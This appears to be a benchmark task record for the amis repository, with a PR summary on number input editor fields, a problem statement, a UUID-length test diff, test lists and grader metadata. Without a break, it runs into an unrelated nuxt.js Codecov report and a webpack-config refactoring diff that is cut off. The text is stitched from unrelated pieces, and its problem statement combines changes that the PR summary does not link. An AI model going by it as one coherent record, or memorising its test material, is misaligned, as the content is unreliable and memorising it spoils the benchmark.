fix: 数字输入框配置面板固定为单侧按钮模式 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 645cd3b</samp> This pull request improves the schema template for the number input control in the amis-editor plugin. It uses the `Schema` type from `amis-core` and avoids formula editors for the `valueFormula` fields in `InputNumber.tsx`. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 645cd3b</samp> > _`Schema` template_ > _Number input gets updated_ > _`displayMode`: `base`_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 645cd3b</samp> * Import `Schema` type from `amis-core` to use as parameter type for `rendererSchema` function in `getSchemaTpl` helper function ([link](https://github.com/baidu/amis/pull/8681/files?diff=unified&w=0#diff-c459de2eb5b316e5e49ab103c7fa1a03c20cf7693bd79b8e039e782b48c5731aR22)) * Set `displayMode` property to `'base'` for `valueFormula` fields (`value`, `min`, and `max`) in `rendererSchema` function to avoid rendering them as formula editors, which are not suitable for number input control ([link](https://github.com/baidu/amis/pull/8681/files?diff=unified&w=0#diff-c459de2eb5b316e5e49ab103c7fa1a03c20cf7693bd79b8e039e782b48c5731aL180-R184), [link](https://github.com/baidu/amis/pull/8681/files?diff=unified&w=0#diff-c459de2eb5b316e5e49ab103c7fa1a03c20cf7693bd79b8e039e782b48c5731aL186-R194), [link](https://github.com/baidu/amis/pull/8681/files?diff=unified&w=0#diff-c459de2eb5b316e5e49ab103c7fa1a03c20cf7693bd79b8e039e782b48c5731aL197-R206))
**Title** Fix number input configuration UI and correct UUID length handling **Problem** The configuration panel for numeric inputs displayed formula editors for value, minimum and maximum fields, which is unsuitable for plain numbers. Additionally, the UUID helper allowed a default length that exceeded the intended maximum. **Root Cause** The schema generator used the generic renderer configuration, leaving the editor in formula mode, and the UUID function defaulted to 36 characters without proper bounds. **Fix / Expected Behavior** - The numeric input panel now presents simple numeric editors for value, min and max, removing the formula editor option. - The schema generation explicitly sets the display mode to the basic numeric form for these fields. - The UUID utility defaults to a maximum of 32 characters and caps the requested length accordingly. **Risk & Validation** - Verify that other form controls still render their formula editors where appropriate. - Ensure the numeric input UI behaves correctly in the editor and that generated schemas match the expected simple format. - Add tests or checks confirming that generated UUID strings never exceed 32 characters.
8,681
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 151d84a7a..25a7e875f 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -564,14 +564,7 @@ test('evalute:Math', () => { }); test('evalute:UUID', () => { - function isUUIDv4(value: string) { - return /^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i.test( - value - ); - } - - expect(isUUIDv4(evaluate('${UUID()}', {}))).toBe(true); - expect(evaluate('${UUID()}', {}).length).toBe(36); + expect(evaluate('${UUID()}', {}).length).toBe(32); expect(evaluate('${UUID(8)}', {}).length).toBe(8); });
[ "evalute:UUID" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "evalute:namespace", "evalute:speical characters", "async-evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnUUID(self, length: number = 32) Location: packages/amis-formula/src/evalutor.ts Inputs: length – optional number, clamped to the range [0, 32] (default 32) Outputs: string – a UUID v4 substring whose length equals the final clamped *length* (up to 32 characters) Description: Generates a UUID string and returns its first *length* characters; the default now yields a 32‑character UUID instead of the previous 36‑character value.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 2, "num_modified_lines": 17, "pr_author": "igrowp", "pr_labels": [ "fix" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.9, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests updating the number input schema in the editor to use the `Schema` type and force `displayMode: 'base'` for valueFormula fields. The provided test patch, however, alters a UUID length expectation in a formula evaluator test, which is unrelated to the UI schema change and therefore does not verify the stated requirements. This mismatch indicates a test‑suite coupling problem where the fix targets an unrelated test, leading to environment preparation issues.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Test modifies UUID length expectation (36 → 32) in evalute.test.ts, which is unrelated to the number input schema change described in the issue." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3ed9f3e6a6b4473cecc6407e36b44f5a5b43ef27
2019-02-18 10:32:14
codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=h1) Report > Merging [#5054](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/b9391d7ea07f11cd5ed6eb318111e490b9af4f8c?src=pr&el=desc) will **increase** coverage by `0.09%`. > The diff coverage is `96.93%`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5054 +/- ## ========================================== + Coverage 94.98% 95.08% +0.09% ========================================== Files 72 72 Lines 2414 2421 +7 Branches 615 614 -1 ========================================== + Hits 2293 2302 +9 + Misses 101 99 -2 Partials 20 20 ``` | [Impacted Files](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [packages/webpack/src/config/client.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvY29uZmlnL2NsaWVudC5qcw==) | `96.29% <100%> (+0.46%)` | :arrow_up: | | [packages/webpack/src/config/server.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvY29uZmlnL3NlcnZlci5qcw==) | `100% <100%> (ø)` | :arrow_up: | | [packages/webpack/src/utils/postcss.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvdXRpbHMvcG9zdGNzcy5qcw==) | `91.83% <100%> (-0.48%)` | :arrow_down: | | [packages/webpack/src/builder.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvYnVpbGRlci5qcw==) | `94.68% <100%> (ø)` | :arrow_up: | | [packages/webpack/src/config/modern.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvY29uZmlnL21vZGVybi5qcw==) | `100% <100%> (ø)` | :arrow_up: | | [packages/builder/src/context/build.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvYnVpbGRlci9zcmMvY29udGV4dC9idWlsZC5qcw==) | `100% <100%> (ø)` | :arrow_up: | | [packages/webpack/src/utils/perf-loader.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvdXRpbHMvcGVyZi1sb2FkZXIuanM=) | `100% <100%> (ø)` | :arrow_up: | | [packages/webpack/src/utils/style-loader.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvdXRpbHMvc3R5bGUtbG9hZGVyLmpz) | `94.11% <100%> (-0.17%)` | :arrow_down: | | [packages/webpack/src/config/base.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvY29uZmlnL2Jhc2UuanM=) | `95.45% <89.65%> (ø)` | :arrow_up: | | [packages/vue-renderer/src/renderer.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvdnVlLXJlbmRlcmVyL3NyYy9yZW5kZXJlci5qcw==) | `95.85% <0%> (+1.03%)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=footer). Last update [b9391d7...07f95f8](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
nuxt__nuxt.js-5054
diff --git a/packages/builder/src/context/build.js b/packages/builder/src/context/build.js index 3b60d116e..8dcd1b39a 100644 --- a/packages/builder/src/context/build.js +++ b/packages/builder/src/context/build.js @@ -6,6 +6,10 @@ export default class BuildContext { this.isStatic = false } + get buildOptions() { + return this.options.build + } + get plugins() { return this._builder.plugins } diff --git a/packages/webpack/src/builder.js b/packages/webpack/src/builder.js index 125c567bc..9c0b9d44c 100644 --- a/packages/webpack/src/builder.js +++ b/packages/webpack/src/builder.js @@ -19,8 +19,8 @@ import PerfLoader from './utils/perf-loader' const glob = pify(Glob) export class WebpackBundler { - constructor(context) { - this.context = context + constructor(buildContext) { + this.buildContext = buildContext // Fields that set on build this.compilers = [] this.compilersWatching = [] @@ -28,7 +28,7 @@ export class WebpackBundler { this.hotMiddleware = {} // Initialize shared MFS for dev - if (this.context.options.dev) { + if (this.buildContext.options.dev) { this.mfs = new MFS() // TODO: Enable when async FS required @@ -38,7 +38,7 @@ export class WebpackBundler { } async build() { - const { options } = this.context + const { options } = this.buildContext const compilersOptions = [] @@ -60,7 +60,7 @@ export class WebpackBundler { compilersOptions.push(serverConfig) } - for (const p of this.context.plugins) { + for (const p of this.buildContext.plugins) { // Client config if (!clientConfig.resolve.alias[p.name]) { clientConfig.resolve.alias[p.name] = p.mode === 'server' ? './empty.js' : p.src @@ -78,7 +78,7 @@ export class WebpackBundler { } // Check styleResource existence - const { styleResources } = this.context.options.build + const { styleResources } = this.buildContext.options.build if (styleResources && Object.keys(styleResources).length) { consola.warn( 'Using styleResources without the nuxt-style-resources-module is not suggested and can lead to severe performance issues.', @@ -86,7 +86,7 @@ export class WebpackBundler { ) for (const ext of Object.keys(styleResources)) { await Promise.all(wrapArray(styleResources[ext]).map(async (p) => { - const styleResourceFiles = await glob(path.resolve(this.context.options.rootDir, p)) + const styleResourceFiles = await glob(path.resolve(this.buildContext.options.rootDir, p)) if (!styleResourceFiles || styleResourceFiles.length === 0) { throw new Error(`Style Resource not found: ${p}`) @@ -122,7 +122,7 @@ export class WebpackBundler { async webpackCompile(compiler) { const { name } = compiler.options - const { nuxt, options } = this.context + const { nuxt, options } = this.buildContext await nuxt.callHook('build:compile', { name, compiler }) @@ -179,7 +179,7 @@ export class WebpackBundler { consola.debug('Adding webpack middleware...') const { name } = compiler.options - const { nuxt: { server }, options } = this.context + const { nuxt: { server }, options } = this.buildContext const { client, ...hotMiddlewareOptions } = options.build.hotMiddleware || {} // Create webpack dev middleware @@ -255,6 +255,6 @@ export class WebpackBundler { } forGenerate() { - this.context.isStatic = true + this.buildContext.isStatic = true } } diff --git a/packages/webpack/src/config/base.js b/packages/webpack/src/config/base.js index 349a0e264..ee079da56 100644 --- a/packages/webpack/src/config/base.js +++ b/packages/webpack/src/config/base.js @@ -20,16 +20,9 @@ import WarnFixPlugin from '../plugins/warnfix' import { reservedVueTags } from '../utils/reserved-tags' export default class WebpackBaseConfig { - constructor(builder, options) { - this.name = options.name - this.isServer = options.isServer - this.isModern = options.isModern + constructor(builder) { this.builder = builder - this.nuxt = builder.context.nuxt - this.isStatic = builder.context.isStatic - this.options = builder.context.options - this.loaders = this.options.build.loaders - this.buildMode = this.options.dev ? 'development' : 'production' + this.buildContext = builder.buildContext this.modulesToTranspile = this.normalizeTranspile() } @@ -43,17 +36,29 @@ export default class WebpackBaseConfig { get nuxtEnv() { return { - isDev: this.options.dev, + isDev: this.dev, isServer: this.isServer, isClient: !this.isServer, isModern: !!this.isModern } } + get mode() { + return this.dev ? 'development' : 'production' + } + + get dev() { + return this.buildContext.options.dev + } + + get loaders() { + return this.buildContext.buildOptions.loaders + } + normalizeTranspile() { // include SFCs in node_modules const items = [/\.vue\.js/i] - for (const pattern of this.options.build.transpile) { + for (const pattern of this.buildContext.buildOptions.transpile) { if (pattern instanceof RegExp) { items.push(pattern) } else { @@ -65,7 +70,7 @@ export default class WebpackBaseConfig { } getBabelOptions() { - const options = clone(this.options.build.babel) + const options = clone(this.buildContext.buildOptions.babel) if (typeof options.presets === 'function') { options.presets = options.presets({ isServer: this.isServer }) @@ -86,11 +91,11 @@ export default class WebpackBaseConfig { } getFileName(key) { - let fileName = this.options.build.filenames[key] + let fileName = this.buildContext.buildOptions.filenames[key] if (typeof fileName === 'function') { fileName = fileName(this.nuxtEnv) } - if (this.options.dev) { + if (this.dev) { const hash = /\[(chunkhash|contenthash|hash)(?::(\d+))?]/.exec(fileName) if (hash) { consola.warn(`Notice: Please do not use ${hash[1]} in dev mode to prevent memory leak`) @@ -105,11 +110,11 @@ export default class WebpackBaseConfig { env() { const env = { - 'process.env.NODE_ENV': JSON.stringify(this.buildMode), - 'process.mode': JSON.stringify(this.options.mode), - 'process.static': this.isStatic + 'process.env.NODE_ENV': JSON.stringify(this.mode), + 'process.mode': JSON.stringify(this.mode), + 'process.static': this.buildContext.isStatic } - Object.entries(this.options.env).forEach(([key, value]) => { + Object.entries(this.buildContext.options.env).forEach(([key, value]) => { env['process.env.' + key] = ['boolean', 'number'].includes(typeof value) ? value @@ -119,19 +124,21 @@ export default class WebpackBaseConfig { } output() { + const { + options: { buildDir, router }, + buildOptions: { publicPath } + } = this.buildContext return { - path: path.resolve(this.options.buildDir, 'dist', this.isServer ? 'server' : 'client'), + path: path.resolve(buildDir, 'dist', this.isServer ? 'server' : 'client'), filename: this.getFileName('app'), futureEmitAssets: true, // TODO: Remove when using webpack 5 chunkFilename: this.getFileName('chunk'), - publicPath: isUrl(this.options.build.publicPath) - ? this.options.build.publicPath - : urlJoin(this.options.router.base, this.options.build.publicPath) + publicPath: isUrl(publicPath) ? publicPath : urlJoin(router.base, publicPath) } } optimization() { - const optimization = cloneDeep(this.options.build.optimization) + const optimization = cloneDeep(this.buildContext.buildOptions.optimization) if (optimization.minimize && optimization.minimizer === undefined) { optimization.minimizer = this.minimizer() @@ -142,13 +149,14 @@ export default class WebpackBaseConfig { minimizer() { const minimizer = [] + const { terser, cache } = this.buildContext.buildOptions // https://github.com/webpack-contrib/terser-webpack-plugin - if (this.options.build.terser) { + if (terser) { minimizer.push( new TerserWebpackPlugin(Object.assign({ parallel: true, - cache: this.options.build.cache, + cache, sourceMap: this.devtool && /source-?map/.test(this.devtool), extractComments: { filename: 'LICENSES' @@ -164,7 +172,7 @@ export default class WebpackBaseConfig { reserved: reservedVueTags } } - }, this.options.build.terser)) + }, terser)) ) } @@ -172,7 +180,7 @@ export default class WebpackBaseConfig { } alias() { - const { srcDir, rootDir, dir: { assets: assetsDir, static: staticDir } } = this.options + const { srcDir, rootDir, dir: { assets: assetsDir, static: staticDir } } = this.buildContext.options return { '~': path.join(srcDir), @@ -185,10 +193,9 @@ export default class WebpackBaseConfig { } rules() { - const perfLoader = new PerfLoader(this) + const perfLoader = new PerfLoader(this.name, this.buildContext) const styleLoader = new StyleLoader( - this.options, - this.nuxt, + this.buildContext, { isServer: this.isServer, perfLoader } ) const babelLoader = { @@ -329,25 +336,26 @@ export default class WebpackBaseConfig { plugins() { const plugins = [] + const { nuxt, buildOptions } = this.buildContext // Add timefix-plugin before others plugins - if (this.options.dev) { + if (this.dev) { plugins.push(new TimeFixPlugin()) } // CSS extraction) - if (this.options.build.extractCSS) { + if (buildOptions.extractCSS) { plugins.push(new ExtractCssChunksPlugin(Object.assign({ filename: this.getFileName('css'), chunkFilename: this.getFileName('css'), // TODO: https://github.com/faceyspacey/extract-css-chunks-webpack-plugin/issues/132 reloadAll: true - }, this.options.build.extractCSS))) + }, buildOptions.extractCSS))) } plugins.push(new VueLoader.VueLoaderPlugin()) - plugins.push(...(this.options.build.plugins || [])) + plugins.push(...(buildOptions.plugins || [])) // Hide warnings about plugins without a default export (#1179) plugins.push(new WarnFixPlugin()) @@ -362,37 +370,38 @@ export default class WebpackBaseConfig { 'profile', 'stats' ], - basic: !this.options.build.quiet && env.minimalCLI, - fancy: !this.options.build.quiet && !env.minimalCLI, - profile: !this.options.build.quiet && this.options.build.profile, - stats: !this.options.build.quiet && !this.options.dev && this.options.build.stats, + basic: !buildOptions.quiet && env.minimalCLI, + fancy: !buildOptions.quiet && !env.minimalCLI, + profile: !buildOptions.quiet && buildOptions.profile, + stats: !buildOptions.quiet && !this.dev && buildOptions.stats, reporter: { change: (_, { shortPath }) => { if (!this.isServer) { - this.nuxt.callHook('bundler:change', shortPath) + nuxt.callHook('bundler:change', shortPath) } }, - done: (context) => { - if (context.hasErrors) { - this.nuxt.callHook('bundler:error') + done: (buildContext) => { + if (buildContext.hasErrors) { + nuxt.callHook('bundler:error') } }, allDone: () => { - this.nuxt.callHook('bundler:done') + nuxt.callHook('bundler:done') } } })) - if (this.options.build.hardSource) { - plugins.push(new HardSourcePlugin(Object.assign({}, this.options.build.hardSource))) + if (buildOptions.hardSource) { + plugins.push(new HardSourcePlugin(Object.assign({}, buildOptions.hardSource))) } return plugins } extendConfig(config) { - if (typeof this.options.build.extend === 'function') { - const extendedConfig = this.options.build.extend.call( + const { extend } = this.buildContext.buildOptions + if (typeof extend === 'function') { + const extendedConfig = extend.call( this.builder, config, { loaders: this.loaders, ...this.nuxtEnv } ) // Only overwrite config when something is returned for backwards compatibility @@ -405,17 +414,17 @@ export default class WebpackBaseConfig { config() { // Prioritize nested node_modules in webpack search path (#2558) - const webpackModulesDir = ['node_modules'].concat(this.options.modulesDir) + const webpackModulesDir = ['node_modules'].concat(this.buildContext.options.modulesDir) const config = { name: this.name, - mode: this.buildMode, + mode: this.mode, devtool: this.devtool, optimization: this.optimization(), output: this.output(), performance: { maxEntrypointSize: 1000 * 1024, - hints: this.options.dev ? false : 'warning' + hints: this.dev ? false : 'warning' }, resolve: { extensions: ['.wasm', '.mjs', '.js', '.json', '.vue', '.jsx', '.ts', '.tsx'], diff --git a/packages/webpack/src/config/client.js b/packages/webpack/src/config/client.js index 68589eb44..dc1c9078d 100644 --- a/packages/webpack/src/config/client.js +++ b/packages/webpack/src/config/client.js @@ -14,12 +14,15 @@ import VueSSRClientPlugin from '../plugins/vue/client' import WebpackBaseConfig from './base' export default class WebpackClientConfig extends WebpackBaseConfig { - constructor(builder, options) { - super(builder, options || { name: 'client', isServer: false }) + constructor(builder) { + super(builder) + this.name = 'client' + this.isServer = false + this.isModern = false } getFileName(...args) { - if (this.options.build.analyze) { + if (this.buildContext.buildOptions.analyze) { const [key] = args if (['app', 'chunk'].includes(key)) { return `${this.isModern ? 'modern-' : ''}[name].js` @@ -44,7 +47,7 @@ export default class WebpackClientConfig extends WebpackBaseConfig { // Small, known and common modules which are usually used project-wise // Sum of them may not be more than 244 KiB if ( - this.options.build.splitChunks.commons === true && + this.buildContext.buildOptions.splitChunks.commons === true && optimization.splitChunks.cacheGroups.commons === undefined ) { optimization.splitChunks.cacheGroups.commons = { @@ -60,14 +63,13 @@ export default class WebpackClientConfig extends WebpackBaseConfig { minimizer() { const minimizer = super.minimizer() + const { optimizeCSS } = this.buildContext.buildOptions // https://github.com/NMFR/optimize-css-assets-webpack-plugin // https://github.com/webpack-contrib/mini-css-extract-plugin#minimizing-for-production // TODO: Remove OptimizeCSSAssetsPlugin when upgrading to webpack 5 - if (this.options.build.optimizeCSS) { - minimizer.push( - new OptimizeCSSAssetsPlugin(Object.assign({}, this.options.build.optimizeCSS)) - ) + if (optimizeCSS) { + minimizer.push(new OptimizeCSSAssetsPlugin(Object.assign({}, optimizeCSS))) } return minimizer @@ -75,14 +77,15 @@ export default class WebpackClientConfig extends WebpackBaseConfig { plugins() { const plugins = super.plugins() + const { buildOptions, options: { appTemplatePath, buildDir, rootDir, modern } } = this.buildContext // Generate output HTML for SSR - if (this.options.build.ssr) { + if (buildOptions.ssr) { plugins.push( new HTMLPlugin({ filename: '../server/index.ssr.html', - template: this.options.appTemplatePath, - minify: this.options.build.html.minify, + template: appTemplatePath, + minify: buildOptions.html.minify, inject: false // Resources will be injected using bundleRenderer }) ) @@ -91,8 +94,8 @@ export default class WebpackClientConfig extends WebpackBaseConfig { plugins.push( new HTMLPlugin({ filename: '../server/index.spa.html', - template: this.options.appTemplatePath, - minify: this.options.build.html.minify, + template: appTemplatePath, + minify: buildOptions.html.minify, inject: true, chunksSortMode: 'dependency' }), @@ -102,53 +105,53 @@ export default class WebpackClientConfig extends WebpackBaseConfig { new webpack.DefinePlugin(this.env()) ) - if (this.options.dev) { + if (this.dev) { // TODO: webpackHotUpdate is not defined: https://github.com/webpack/webpack/issues/6693 plugins.push(new webpack.HotModuleReplacementPlugin()) } // Webpack Bundle Analyzer // https://github.com/webpack-contrib/webpack-bundle-analyzer - if (!this.options.dev && this.options.build.analyze) { - const statsDir = path.resolve(this.options.buildDir, 'stats') + if (!this.dev && buildOptions.analyze) { + const statsDir = path.resolve(buildDir, 'stats') plugins.push(new BundleAnalyzer.BundleAnalyzerPlugin(Object.assign({ analyzerMode: 'static', defaultSizes: 'gzip', generateStatsFile: true, - openAnalyzer: !this.options.build.quiet, + openAnalyzer: !buildOptions.quiet, reportFilename: path.resolve(statsDir, `${this.name}.html`), statsFilename: path.resolve(statsDir, `${this.name}.json`) - }, this.options.build.analyze))) + }, buildOptions.analyze))) } - if (this.options.modern) { + if (modern) { plugins.push(new ModernModePlugin({ - targetDir: path.resolve(this.options.buildDir, 'dist', 'client'), + targetDir: path.resolve(buildDir, 'dist', 'client'), isModernBuild: this.isModern })) } - if (this.options.build.crossorigin) { + if (buildOptions.crossorigin) { plugins.push(new CorsPlugin({ - crossorigin: this.options.build.crossorigin + crossorigin: buildOptions.crossorigin })) } // TypeScript type checker // Only performs once per client compilation and only if `ts-loader` checker is not used (transpileOnly: true) - if (!this.isModern && this.loaders.ts.transpileOnly && this.options.build.useForkTsChecker) { - const forkTsCheckerResolvedPath = this.nuxt.resolver.resolveModule('fork-ts-checker-webpack-plugin') + if (!this.isModern && this.loaders.ts.transpileOnly && buildOptions.useForkTsChecker) { + const forkTsCheckerResolvedPath = this.buildContext.nuxt.resolver.resolveModule('fork-ts-checker-webpack-plugin') if (forkTsCheckerResolvedPath) { const ForkTsCheckerWebpackPlugin = require(forkTsCheckerResolvedPath) plugins.push(new ForkTsCheckerWebpackPlugin(Object.assign({ vue: true, - tsconfig: path.resolve(this.options.rootDir, 'tsconfig.json'), + tsconfig: path.resolve(rootDir, 'tsconfig.json'), // https://github.com/Realytics/fork-ts-checker-webpack-plugin#options - tslint: boolean | string - So we set it false if file not found - tslint: (tslintPath => fs.existsSync(tslintPath) && tslintPath)(path.resolve(this.options.rootDir, 'tslint.json')), + tslint: (tslintPath => fs.existsSync(tslintPath) && tslintPath)(path.resolve(rootDir, 'tslint.json')), formatter: 'codeframe', logger: consola - }, this.options.build.useForkTsChecker))) + }, buildOptions.useForkTsChecker))) } else { consola.warn('You need to install `fork-ts-checker-webpack-plugin` as devDependency to enable TypeScript type checking !') } @@ -159,8 +162,12 @@ export default class WebpackClientConfig extends WebpackBaseConfig { config() { const config = super.config() + const { + options: { router, buildDir }, + buildOptions: { hotMiddleware, quiet, friendlyErrors } + } = this.buildContext - const { client = {} } = this.options.build.hotMiddleware || {} + const { client = {} } = hotMiddleware || {} const { ansiColors, overlayStyles, ...options } = client const hotMiddlewareClientOptions = { reload: true, @@ -170,17 +177,17 @@ export default class WebpackClientConfig extends WebpackBaseConfig { ...options, name: this.name } - const clientPath = `${this.options.router.base}/__webpack_hmr/${this.name}` + const clientPath = `${router.base}/__webpack_hmr/${this.name}` const hotMiddlewareClientOptionsStr = `${querystring.stringify(hotMiddlewareClientOptions)}&path=${clientPath}`.replace(/\/\//g, '/') // Entry points config.entry = { - app: [path.resolve(this.options.buildDir, 'client.js')] + app: [path.resolve(buildDir, 'client.js')] } // Add HMR support - if (this.options.dev) { + if (this.dev) { config.entry.app.unshift( // https://github.com/webpack-contrib/webpack-hot-middleware/issues/53#issuecomment-162823945 'eventsource-polyfill', @@ -190,7 +197,7 @@ export default class WebpackClientConfig extends WebpackBaseConfig { } // Add friendly error plugin - if (this.options.dev && !this.options.build.quiet && this.options.build.friendlyErrors) { + if (this.dev && !quiet && friendlyErrors) { config.plugins.push( new FriendlyErrorsWebpackPlugin({ clearConsole: false, diff --git a/packages/webpack/src/config/modern.js b/packages/webpack/src/config/modern.js index 8431de582..27512b2a4 100644 --- a/packages/webpack/src/config/modern.js +++ b/packages/webpack/src/config/modern.js @@ -2,8 +2,10 @@ import clone from 'lodash/clone' import WebpackClientConfig from './client' export default class WebpackModernConfig extends WebpackClientConfig { - constructor(builder) { - super(builder, { name: 'modern', isServer: false, isModern: true }) + constructor(...args) { + super(...args) + this.name = 'modern' + this.isModern = true } env() { @@ -13,7 +15,7 @@ export default class WebpackModernConfig extends WebpackClientConfig { } getBabelOptions() { - const options = clone(this.options.build.babel) + const options = clone(this.buildContext.buildOptions.babel) options.presets = [ [ diff --git a/packages/webpack/src/config/server.js b/packages/webpack/src/config/server.js index f2e34f104..548267834 100644 --- a/packages/webpack/src/config/server.js +++ b/packages/webpack/src/config/server.js @@ -9,8 +9,10 @@ import VueSSRServerPlugin from '../plugins/vue/server' import WebpackBaseConfig from './base' export default class WebpackServerConfig extends WebpackBaseConfig { - constructor(builder) { - super(builder, { name: 'server', isServer: true }) + constructor(...args) { + super(...args) + this.name = 'server' + this.isServer = true this.whitelist = this.normalizeWhitelist() } @@ -18,7 +20,7 @@ export default class WebpackServerConfig extends WebpackBaseConfig { const whitelist = [ /\.(?!js(x|on)?$)/i ] - for (const pattern of this.options.build.transpile) { + for (const pattern of this.buildContext.buildOptions.transpile) { if (pattern instanceof RegExp) { whitelist.push(pattern) } else { @@ -68,7 +70,7 @@ export default class WebpackServerConfig extends WebpackBaseConfig { target: 'node', node: false, entry: { - app: [path.resolve(this.options.buildDir, 'server.js')] + app: [path.resolve(this.buildContext.options.buildDir, 'server.js')] }, output: Object.assign({}, config.output, { filename: 'server.js', @@ -85,8 +87,8 @@ export default class WebpackServerConfig extends WebpackBaseConfig { // https://webpack.js.org/configuration/externals/#externals // https://github.com/liady/webpack-node-externals // https://vue-loader.vuejs.org/migrating.html#ssr-externals - if (!this.options.build.standalone) { - this.options.modulesDir.forEach((dir) => { + if (!this.buildContext.buildOptions.standalone) { + this.buildContext.options.modulesDir.forEach((dir) => { if (fs.existsSync(dir)) { config.externals.push( nodeExternals({ diff --git a/packages/webpack/src/utils/perf-loader.js b/packages/webpack/src/utils/perf-loader.js index 7fff23f8c..490d82929 100644 --- a/packages/webpack/src/utils/perf-loader.js +++ b/packages/webpack/src/utils/perf-loader.js @@ -6,10 +6,10 @@ import { warmup } from 'thread-loader' // https://github.com/webpack-contrib/cache-loader export default class PerfLoader { - constructor(config) { - this.name = config.name - this.options = config.options - this.workerPools = PerfLoader.defaultPools(this.options) + constructor(name, buildContext) { + this.name = name + this.buildContext = buildContext + this.workerPools = PerfLoader.defaultPools({ dev: buildContext.options.dev }) return new Proxy(this, { get(target, name) { return target[name] ? target[name] : target.use.bind(target, name) @@ -25,13 +25,13 @@ export default class PerfLoader { } } - static warmupAll(options) { - options = 